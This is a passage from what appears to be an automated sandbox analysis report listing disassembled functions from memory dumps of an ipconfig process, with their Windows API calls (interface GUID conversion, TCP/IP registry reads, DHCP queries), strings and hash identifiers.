                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: 54e8b6c78dd9941dda6535673561e8ef8279b4249ada17b2714c75e76e737eb5
                                                                                              • Instruction ID: cc8b3271c152bb9c6619173d214055461750a338aa0cb3361b5db0a3f95b7222
                                                                                              • Opcode Fuzzy Hash: 54e8b6c78dd9941dda6535673561e8ef8279b4249ada17b2714c75e76e737eb5
                                                                                              • Instruction Fuzzy Hash: 04410131700216ABEB21CE25CC41B66B7A5FFA4718F108618F956DB340DB20EC56CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 17a8719e6118ae17e003e4016fa91384b30e54ae7812d8ddb2d02ad22404d5e4
                                                                                              • Instruction ID: bf3e5eae127de39472d7c16e48dfece91e30b4d0b60541aa377ea62f4ad3afbd
                                                                                              • Opcode Fuzzy Hash: 17a8719e6118ae17e003e4016fa91384b30e54ae7812d8ddb2d02ad22404d5e4
                                                                                              • Instruction Fuzzy Hash: 28314372A002199FDB60DE29CC58BFE77A9EB44754F44455AEC89E3240EB30AE55CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C72B76
                                                                                              • ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00C72B8D
                                                                                                • Part of subcall function 00C72C01: memset.MSVCRT ref: 00C72C2B
                                                                                                • Part of subcall function 00C72C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80
                                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,?,?,00000200,00000001,?), ref: 00C72BCE
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
                                                                                              • String ID: Dhcpv6ClassId
                                                                                              • API String ID: 2135874933-1235502083
                                                                                              • Opcode ID: 9b308244946182979c71fd51412c39d9f7dd457993febfee7adbbad1c1ba0d75
                                                                                              • Instruction ID: ec95f0224617146f65892f33ea384fafe6b4efaf302010ce4a26369e89ef137d
                                                                                              • Opcode Fuzzy Hash: 9b308244946182979c71fd51412c39d9f7dd457993febfee7adbbad1c1ba0d75
                                                                                              • Instruction Fuzzy Hash: A011FE71A0420CABDB20DFA1CD8DFEE77BCAB14704F4041A5A50EE6190EB71AB899B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C721D5
                                                                                              • ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00C721EC
                                                                                                • Part of subcall function 00C72260: memset.MSVCRT ref: 00C7228A
                                                                                                • Part of subcall function 00C72260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF
                                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,?,?,00000200,00000001,?), ref: 00C7222D
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
                                                                                              • String ID: DhcpClassId
                                                                                              • API String ID: 2135874933-3964061114
                                                                                              • Opcode ID: 8009567a506669722648ba0633484dfb896c788282ef7b1dd52cb74a4a12384c
                                                                                              • Instruction ID: cf3c269ac48681a7d50638f04e49d225b51d490d6a6d28922b99d94b3d76e3e5
                                                                                              • Opcode Fuzzy Hash: 8009567a506669722648ba0633484dfb896c788282ef7b1dd52cb74a4a12384c
                                                                                              • Instruction Fuzzy Hash: 4E112E71A0420CABDB10EFA1CD8DFEEB7BCAB44704F5081A5A51DE6091EB71DA898F50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00C7228A
                                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF
                                                                                              Strings
                                                                                              • SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\, xrefs: 00C72291
                                                                                              • 0mduPIdu, xrefs: 00C722DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Openmemset
                                                                                              • String ID: 0mduPIdu$SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
                                                                                              • API String ID: 180050240-2801144683
                                                                                              • Opcode ID: 103c4344b9a2f19fe6016db0939931ca8ab9c1c8b66ea0b89926a95df423a8e5
                                                                                              • Instruction ID: d4478f91f8884430a6423061238947e64cb4385dea0950a92591479c96005c4a
                                                                                              • Opcode Fuzzy Hash: 103c4344b9a2f19fe6016db0939931ca8ab9c1c8b66ea0b89926a95df423a8e5
                                                                                              • Instruction Fuzzy Hash: 7001D8B2610218ABE714EB15DC0BFBE73ACEB54714F508065F90DDA1C2DA70EE44D664
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00C72C2B
                                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80
                                                                                              Strings
                                                                                              • SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\, xrefs: 00C72C32
                                                                                              • 0mduPIdu, xrefs: 00C72C80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Openmemset
                                                                                              • String ID: 0mduPIdu$SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\
                                                                                              • API String ID: 180050240-344641710
                                                                                              • Opcode ID: e4507b15bcc9ae6e0a111f50382968473da7512f6eab8124f128e432a3346948
                                                                                              • Instruction ID: 3fad68046266544932ee7511d765b143bfc2ac3891e42bf3a15f8108eeac5367
                                                                                              • Opcode Fuzzy Hash: e4507b15bcc9ae6e0a111f50382968473da7512f6eab8124f128e432a3346948
                                                                                              • Instruction Fuzzy Hash: 6501D8B2600219ABF714EB25DD0BFAE73ACEB50714F50C165F90DEA1C1DA70EE448A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(dhcpcsvc.dll,00000000,00000000,00C72577,00000001), ref: 00C71D26
                                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,DhcpIsEnabled), ref: 00C71D3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: DhcpIsEnabled$dhcpcsvc.dll
                                                                                              • API String ID: 2574300362-2583171064
                                                                                              • Opcode ID: 1f76e5a9ad04a4d7a294fb817ba3050ff7e7bb2ac28aa1ba612ecd9503185a6d
                                                                                              • Instruction ID: aed7db521d857eea3347111a8d19877daa7b385a3a8a6da3250ba15d097f530a
                                                                                              • Opcode Fuzzy Hash: 1f76e5a9ad04a4d7a294fb817ba3050ff7e7bb2ac28aa1ba612ecd9503185a6d
                                                                                              • Instruction Fuzzy Hash: 11D0A734240B03EADB211B3A5C19B5F3AA47720B81F488060FC2CDA2F0DA70C040DE31
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,00000002,00000020), ref: 00C727D1
                                                                                              • NsiSetAllParameters.NSI(00000001,00000005,00C71368,00000019,?,00000008,00000000,00000000), ref: 00C727ED
                                                                                              • Dhcpv6IsEnabled.DHCPCSVC6(00000002,?), ref: 00C72801
                                                                                              • Dhcpv6AcquireParameters.DHCPCSVC6(00000002), ref: 00C72817
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Dhcpv6Parameters$AcquireConvertEnabledFormatFreeInterfaceLocalLuidMessageName__iob_func
                                                                                              • String ID:
                                                                                              • API String ID: 1181060623-0
                                                                                              • Opcode ID: 7f543f918edc3442fc520b43ea18ef9c226b440abf1b58b00ecc750682969e4f
                                                                                              • Instruction ID: 610bc594abee36f385d78c9daecb464985297bbebfcc966a03d9424f7717bc98
                                                                                              • Opcode Fuzzy Hash: 7f543f918edc3442fc520b43ea18ef9c226b440abf1b58b00ecc750682969e4f
                                                                                              • Instruction Fuzzy Hash: 76312A32A007089FDB209BA5CC85BAFB3B9FF54710F148029ED6EA72D1DBB1ED058611
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00C75478: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00C7547F
                                                                                              • __set_app_type.MSVCRT ref: 00C74ED2
                                                                                              • __p__fmode.MSVCRT ref: 00C74EE8
                                                                                              • __p__commode.MSVCRT ref: 00C74EF6
                                                                                              • __setusermatherr.MSVCRT ref: 00C74F17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                              • String ID:
                                                                                              • API String ID: 1632413811-0
                                                                                              • Opcode ID: 683266b7c860b7b3983d82f0ede4a49f9e3dd1db176799be5c8468f20b0c6b1d
                                                                                              • Instruction ID: 690734eb26468bb3deba331cea87d5e6e07efcbba2b77545114c719cb46c1d9f
                                                                                              • Opcode Fuzzy Hash: 683266b7c860b7b3983d82f0ede4a49f9e3dd1db176799be5c8468f20b0c6b1d
                                                                                              • Instruction Fuzzy Hash: F2F0A575544B04CFD718AB70AC8A71C3B70BB45726B508759E46E862F1DBB695C0DB20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction ID: 4c44da7a87112538d1c61edf8c6364717e105263b0f8d310a4ea6d1fd48cee10
                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction Fuzzy Hash: 4691C371E002069FDBE4CF69C880BBEF7A5AF84324F55461AEA55EB2C0E7318A45CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: eec146b993264fa002e4cb6276111fa41974c0f17cfb4a18c87eb8a2dd9b68d2
                                                                                              • Instruction ID: b4e1875562455700af7c4b90ffeaabc36e1134aa88aa02ef92132e73ef2a4a77
                                                                                              • Opcode Fuzzy Hash: eec146b993264fa002e4cb6276111fa41974c0f17cfb4a18c87eb8a2dd9b68d2
                                                                                              • Instruction Fuzzy Hash: 60813C71D002799BDB25CB54CC48BEEB7B8AF48714F0041EAEA19B7690D7309E84DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02D3CFBD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFilterFunc@8
                                                                                              • String ID: @$@4_w@4_w
                                                                                              • API String ID: 4062629308-713214301
                                                                                              • Opcode ID: 88fa6ccf6ec071278b716c2c84c59a5cb66a6b95c44793b435166ea266d98a50
                                                                                              • Instruction ID: a9f03b8635e11d219fe54ce7e59a09e4575a827519f171847c6572d1b22a9f27
                                                                                              • Opcode Fuzzy Hash: 88fa6ccf6ec071278b716c2c84c59a5cb66a6b95c44793b435166ea266d98a50
                                                                                              • Instruction Fuzzy Hash: CC41BD71900254DFDB229FA4D840AAEBBBAEF44B04F20446AE915EB3A0D774DC45DF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%